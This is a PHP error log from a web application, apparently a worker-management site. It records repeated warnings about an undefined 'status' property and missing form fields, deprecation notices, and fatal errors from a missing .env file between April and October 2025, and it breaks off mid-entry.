19 [10-Apr-2025 22:43:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 01:03:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 01:03:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 01:03:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 01:03:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 01:16:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 01:26:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 01:27:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 01:28:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 01:29:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 01:42:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 01:45:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 01:46:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 01:57:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 02:02:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 02:32:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 03:09:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 03:11:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 03:21:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 03:21:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 03:22:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 03:37:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 03:37:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 03:37:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 03:37:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 03:38:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 04:03:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 04:15:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 04:41:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 04:51:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 05:17:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 05:17:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 05:31:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 05:52:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 06:00:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 06:04:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 06:16:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [11-Apr-2025 07:32:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 07:32:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 08:23:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 08:33:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 17:50:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Aug-2025 01:24:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Aug-2025 01:25:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Aug-2025 02:59:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Aug-2025 03:09:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Aug-2025 03:14:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Aug-2025 04:59:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Sep-2025 02:45:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Sep-2025 03:25:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Sep-2025 00:43:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Sep-2025 00:31:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Sep-2025 01:45:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Sep-2025 03:34:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Sep-2025 03:42:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Sep-2025 08:24:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Sep-2025 10:45:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Sep-2025 10:51:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Sep-2025 10:51:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Sep-2025 11:13:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Sep-2025 11:13:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Sep-2025 11:44:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Sep-2025 07:16:38 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [30-Sep-2025 07:16:39 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [09-Oct-2025 04:10:36 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [09-Oct-2025 04:10:36 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:43:59 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:44:08 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:44:17 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:44:25 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:44:34 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:46:28 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:46:37 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:46:45 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:46:53 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:47:01 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:48:28 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:48:36 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:48:45 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:48:53 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:49:01 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 06:55:37 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 06:55:47 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 06:55:58 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 06:56:09 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 06:56:22 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 08:31:22 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 08:31:30 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 08:31:39 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 08:31:47 UTC] PHP Fatal error: Uncaught 